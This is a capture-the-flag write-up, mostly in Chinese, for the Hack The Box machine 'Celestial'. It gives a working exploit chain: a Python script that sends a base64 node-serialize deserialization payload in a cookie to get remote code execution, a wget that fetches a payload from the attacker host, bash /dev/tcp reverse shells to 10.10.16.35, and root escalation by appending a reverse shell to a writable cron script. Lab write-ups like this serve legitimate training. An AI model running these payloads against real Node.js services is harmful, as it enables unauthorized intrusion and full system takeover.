Celestial (Hack The Box Writeup)


  • URL : https://app.hackthebox.eu/machines/130
  • IP : 10.129.217.35

Recon

  • 掃 Port
    • nmapAutomator.sh -H 10.129.217.35 -t recon
  • 掃路徑
  • 首頁 404
  • 發現有餅乾
  • F5 後
    • 發現餅乾是 Serialize

Serialize

import requests
import base64

src = b'{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}'
dst = base64.b64encode(src).decode('ascii')
cookies = {
    'profile': dst
}

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'If-None-Match': 'W/"c-8lfvj2TmiRRvB7K+JPws1w9h6aY"',
    'Cache-Control': 'max-age=0',
}

response = requests.get('http://10.129.217.35:3000/', headers=headers, cookies=cookies)

print(response.text)

亂戳

{"username": "meow" ,"country":"Idk Probably Somewhere Dumb","city":"Lametown","num": true}

會回傳

Hey meow true + true is 2

戳

{"username": "meow" ,"country":"Idk Probably Somewhere Dumb","city":"Lametown","num": []}

會回傳

Hey meow  +  is undefined

戳

eval("A")

會噴錯
錯誤中有提到

SyntaxError: Unexpected token e<br> &nbsp; &nbsp;at Object.parse (native)<br> &nbsp; &nbsp;at Object.exports.unserialize (/home/sun/node_modules/node-serialize/lib/serialize.js
  • Google node-serialize exploit
  • https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf

透過 IIFE 來達成 RCE

var y = {
    rce : function(){
    require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });
    },
   }

var serialize = require('node-serialize'); 
console.log("Serialized: \n" + serialize.serialize(y));
{"rce":"_$$ND_FUNC$$_function(){\n    require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\n    }"}
var y = {
    rce : function(){
    require('child_process').exec('id', function(error, stdout, stderr) { console.log(stdout) });}(),
    username: "meow" ,
    country:"Idk Probably Somewhere Dumb",
    city :"Lametown",
    // num: 2,
   }

var serialize = require('node-serialize'); 
// console.log("Serialized: \n" + Buffer.from(serialize.serialize(y)).toString('base64'));

var s = serialize.serialize(y);

// console.log(s)

serialize.unserialize(s)
  • 戳 Reverse shell
    • bash -c 'bash -i >& /dev/tcp/10.10.16.35/7877 0>&1'

Exploit

  • 完整 Payload
    • src = """{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2","rce":"_$$ND_FUNC$$_function (){require('child_process').exec('wget 10.10.16.35', function(error, stdout, stderr) { console.log(stdout) });}()"}"""
import requests
import base64


cmd = "wget 10.10.16.35"
src = """{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2","rce":"_$$ND_FUNC$$_function (){require('child_process').exec('""" + cmd + """', function(error, stdout, stderr) { console.log(stdout) });}()"}"""
src = src.encode('ascii')

dst = base64.b64encode(src).decode('ascii')

cookies = {
    'profile': dst
}

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'If-None-Match': 'W/"c-8lfvj2TmiRRvB7K+JPws1w9h6aY"',
    'Cache-Control': 'max-age=0',
}

response = requests.get('http://10.129.217.35:3000/', headers=headers, cookies=cookies)

print(response.text)
  • 就成功 RCE ㄌ
    • wget 10.10.16.35/s_HTB -O /tmp/s
    • 放 Reverse shell
  • 戳回來

提權

  • python -c 'import pty; pty.spawn("/bin/bash")'
  • 發現家目錄有 output.txt
  • 跑豌豆
      • 找到一個 Cronjob
  • 觀察 output.txt
  • 尋找 Script is running 在哪
    • grep -rnw '/' -e 'Script is running...' 2>/dev/null
  • 找到 user flag
  • script 是 cron job 每5分鐘跑一次,且我們可以修改
  • 戳 reverse shell
    • echo "import os" > script.py
    • echo "os.system(\"bash -c 'bash -i >& /dev/tcp/10.10.16.35/7878 0>&1'\")" >> script.py
  • 收 Reverse shell
,

發表迴響